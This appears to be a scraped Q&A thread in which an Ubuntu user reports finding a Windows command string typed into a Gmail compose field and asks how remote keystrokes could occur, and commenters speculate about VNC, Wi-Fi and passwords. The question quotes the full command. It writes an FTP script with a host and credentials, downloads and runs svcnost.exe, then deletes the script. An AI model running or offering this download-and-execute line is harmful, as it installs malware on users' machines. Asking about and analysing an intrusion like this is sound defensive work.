128
45
My home PC is usually on, but the monitor is off. This evening I came home from work and found what looks like a hack attempt: in my browser, my Gmail was open (that was me), but it was in compose mode with the following in the TO
field:
md /c echo open cCTeamFtp.yi.org 21 >> ik &echo user ccteam10 765824 >> ik &echo binary >> ik &echo get svcnost.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &svcnost.exe &exit echo You got owned
This looks like Windows command line code to me, and the md
start of the code combined with the fact that Gmail was in compose mode, makes it evident that someone tried to run a cmd
command. I'm guess I was lucky that I don't in fact run Windows on this PC, but I have others that do. This is the first time ever that something like this has happened to me. I'm not a Linux guru, and I wasn't running any other programs apart from Firefox at the time.
I'm absolutely sure that I didn't write this, and nobody else was physically at my computer. Also, I have recently changed my Google password (and all my other passwords) to something like vMA8ogd7bv
so I don't think that someone hacked my Google account.
What just happened? How does someone put keystrokes on my computer when it's not granny's old Windows machine that has been running malware for years, but a recent new Ubuntu install?
Update:
Let me address some of the points and questions:
- I'm in Austria, in the countryside. My WLAN router runs WPA2/PSK and a medium-strong password that's not in the dictionary; would have to be brute-force and less than 50 meters from here; it's not likely that it got hacked.
- I'm using a USB wired keyboard, so again very unlikely that anybody could be within range to hack it.
- I wasn't using my computer at the time; it was just idling at home while I was at work. It's a monitor-mounted nettop PC, so I rarely turn it off.
- The machine is only two months old, only runs Ubuntu, and I'm not using weird software or visiting weird sites. It's mainly Stack Exchange, Gmail, and newspapers. No games. Ubuntu is set to keep itself up to date.
- I'm not aware of any VNC service running; I certainly haven't installed or enabled one. I've also not started any other servers. I'm unsure if any are running in Ubuntu by default?
- I know all the IP addresses in Gmail's account activity. I'm fairly sure Google wasn't an entryway.
- I found a Log File Viewer, but I don't know what to look for. Help?
What I really want to know is, and what really makes me feel unsafe, is: how can anyone from the Internet generate keystrokes on my machine? How can I prevent that without being all tinfoil-hat about it? I'm not a Linux geek, I'm a father who's messed with Windows for 20+ years and am tired of it. And in all the 18+ years of being online, I've never personally seen any hack attempt, so this is new to me.
Just because it's a new install doesn't mean you can't have malware, trojans and viruses. And they do exist for Linux as well as Windows. They're just not as common. – BBlake – 2011-04-20T18:29:41.967
4Did anyone else have access to your computer, or do you have a very old wireless keyboard? Also, Ubuntu has a built-in VNC server. If that's active, a random script somewhere could have connected and assumed it was a windows computer, sending the keystrokes WIN+R, cmd...... – TuxRug – 2011-04-20T19:32:48.160
29@torbengb: Your post really scares me... – user541686 – 2011-04-20T20:00:11.580
1@Mehrdad: how do you think I feel? I wasn't planning on computer time tonight. – Torben Gundtofte-Bruun – 2011-04-20T20:02:59.810
@torbengb: If that happened to me, I'd probably freak out for a few days. x___x Can't imagine what you went through... – user541686 – 2011-04-20T20:26:55.000
9Are there any other computers on your wireless network? If the intruder broke their security it would give him an "in" to your local network, which could lead to cracking the Ubuntu box in various ways. – CarlF – 2011-04-20T20:28:20.897
2I suppose the fact that it's left in the field allows you to see what it was the attacker was attempting to do.
Search google for ccteam10 and 765824. It looks like you are probably not the only one who's seen this hack. – music2myear – 2011-04-20T20:30:34.450
@CarlF luckily all other pc's were off, otherwise it could just as well have hit a Windows pc and zombied it! – Torben Gundtofte-Bruun – 2011-04-20T21:14:11.950
@torbengb : that's unlikely, given the evident amateurism of the attack, I doubt that any antivirus would have a problem catching it. – houbysoft – 2011-04-21T01:32:31.480
lol this SO sounds like some smart-a*s script kiddie – Nate Koppenhaver – 2011-04-21T04:08:16.670
1"vMA8ogd7bv" - Did you said that your password is only 8 chars long? – YOU – 2011-04-21T05:23:52.233
@S.Mark: I only gave a rough example. For online stuff I use 10 chars. – Torben Gundtofte-Bruun – 2011-04-21T06:09:36.583
1@torbengb Is that it! Hah! Mine's 20+ chars:
ilkchsaltdy+whtthhllswrngwty+42
– Mateen Ulhaq – 2011-04-21T06:44:37.0074@muntoo ... and 'm sure you haven't written that down anywhere and don't use any app to manage them either, right? Let's not begin password-bashing; at least my password isn't
password
:-) – Torben Gundtofte-Bruun – 2011-04-21T08:39:29.763@CarlF no all other computers were on standby all day. This was the only computer that was on. – Torben Gundtofte-Bruun – 2011-04-21T13:45:35.303
1
@torbengb Nope, I have them all in memory. (I do have a file that keeps my passwords/usernames for different accounts, but you need a master password to crack that.) I do do a bit of password reuse, but I hope to change my habits soon...
– Mateen Ulhaq – 2011-04-21T18:21:10.150Indeed, all you need for remembering a long password is a good mnemonic. – Pops – 2011-04-21T18:47:34.983
6Do you have a cat? – Zaki – 2011-05-19T12:59:17.583